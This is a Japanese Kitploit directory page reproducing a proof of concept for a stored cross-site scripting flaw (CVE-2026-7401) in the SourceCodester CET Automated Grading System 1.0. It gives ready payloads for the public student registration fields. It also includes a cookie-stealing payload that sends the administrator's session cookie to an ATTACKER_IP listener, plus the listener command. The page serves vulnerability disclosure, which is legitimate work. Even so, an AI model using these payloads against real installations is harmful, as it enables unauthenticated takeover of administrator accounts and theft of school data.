Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-7401-XSS — SourceCodester CET Automated Grading System 1.0 における格納型XSSの概念実証。学生登録を介した未認証のペイロード注入により、管理者セッションの乗っ取りに至ることを実証します。 | Kitploit
ツール/GitHubGitHub/xmyronn/cve-2026-7401-xss
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubxmyronn/cve-2026-7401-xss

CVE-2026-7401-XSS

SourceCodester CET Automated Grading System 1.0 における格納型XSSの概念実証。学生登録を介した未認証のペイロード注入により、管理者セッションの乗っ取りに至ることを実証します。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CET自動採点システムの保存型XSS — 学生登録(未認証 → 管理者ダッシュボード)

詳細

フィールド値
ベンダーSourceCodester
ベンダーURLhttps://www.sourcecodester.com
製品CET Automated Grading System with AI Predictive Analytics in PHP and MySQL
製品URLhttps://www.sourcecodester.com/php/18686/cet-automated-grading-system-ai-predictive-analytics-php-and-mysql.html
バージョン1.0
脆弱性保存型クロスサイトスクリプティング(XSS)
CWECWE-79
CVSSv3スコア8.8(高)
攻撃ベクトルネットワーク
認証要件なし(学生の自己登録は公開)
被害者管理者
ユーザー操作必要(管理者がダッシュボードにアクセス)
研究者Imad Alvi
日付2026-04-13

影響を受けるコンポーネント

ファイル: PersonalAGS/index.php?action=register(学生登録)
パラメータ: student_id、full_name、section、username(POST)
トリガー箇所: PersonalAGS/index.php?action=dashboard(管理者ダッシュボード)


説明

CET Automated Grading System 1.0の学生自己登録ポータルは、データベースに保存する前にユーザー入力のサニタイズまたはエンコードを行いません。未認証の攻撃者は、任意の登録フィールドにJavaScriptペイロードを注入して学生アカウントを登録できます。悪意のあるペイロードはデータベースに保存され、登録済みの学生が一覧表示されるダッシュボードにアクセスした管理者のブラウザで実行されます。

これは重大な攻撃チェーンです — ペイロードの注入に認証は不要ですが、特権を持つ管理者コンテキストで実行されるため、セッションCookieの窃取と管理者アカウントの完全乗っ取りが可能になります。


概念実証

ステップ1 — 学生登録ページに移動(認証不要)

公開されている学生自己登録ページに移動します:

root@kitploit:~
http://localhost/cet-personalagms/PersonalAGS/index.php?action=register

ステップ2 — 登録フィールドにXSSペイロードを注入

すべてのフィールドにXSSペイロードを入力し、アカウント登録をクリックします:

  • 学生ID番号: "><svg onload=alert(1)>
  • 氏名: "><svg onload=alert(1)>
  • セクション: "><svg onload=alert(1)>
  • 希望ユーザー名: "><svg onload=alert(1)>
Screenshot 2026-04-13 030707

登録は成功します — ペイロードはデータベースに保存されます。

ステップ3 — 管理者ダッシュボードでXSSが発火

管理者がログインしてダッシュボードにアクセスすると、注入されたペイロードが即座に実行されます。アラートのポップアップが表示され、注入されたHTMLによってページレイアウトが明らかに崩れます — ペイロードが管理者パネルでサニタイズされずにレンダリングされることが確認できます。

ダッシュボードのセクションヘッダーにも注入された値が反映されます:

  • 1ST YEAR - SECTION 1ST YEAR" ONMOUSEOVE
  • 3RD YEAR - SECTION " ONLOAD=ALERT(1) X=
Screenshot 2026-04-13 030717

セッションハイジャック用ペイロード

攻撃者は、登録フィールドで以下のペイロードを使用することで、これを完全な管理者セッションハイジャックにエスカレートできます:

root@kitploit:~
" onmouseover="new Image().src='http://ATTACKER_IP:8888/?c='+document.cookie" x="

攻撃者マシンでリスナーをセットアップします:

root@kitploit:~
python3 -m http.server 8888

管理者がダッシュボードにアクセスすると、そのセッションCookieが攻撃者のサーバーに送信され、アカウントの完全な乗っ取りが可能になります。


影響

未認証の攻撃者は以下を実行できます:

  • 公開の学生登録を介して管理者ダッシュボードに永続的なJavaScriptを注入
  • 管理者のセッションCookieを窃取し、管理者アカウントを乗っ取り
  • 被害者に代わって任意の管理者操作を実行
  • 管理者を悪意のあるページにリダイレクト
  • 管理者ダッシュボードを改ざん

ペイロードの注入に認証は不要です。攻撃は、管理者がダッシュボードにアクセスすると自動的に実行されます。


参考情報

  • SourceCodester — CET Automated Grading System
  • CWE-79: ウェブページ生成時の入力の不適切な無害化
ツールをダウンロード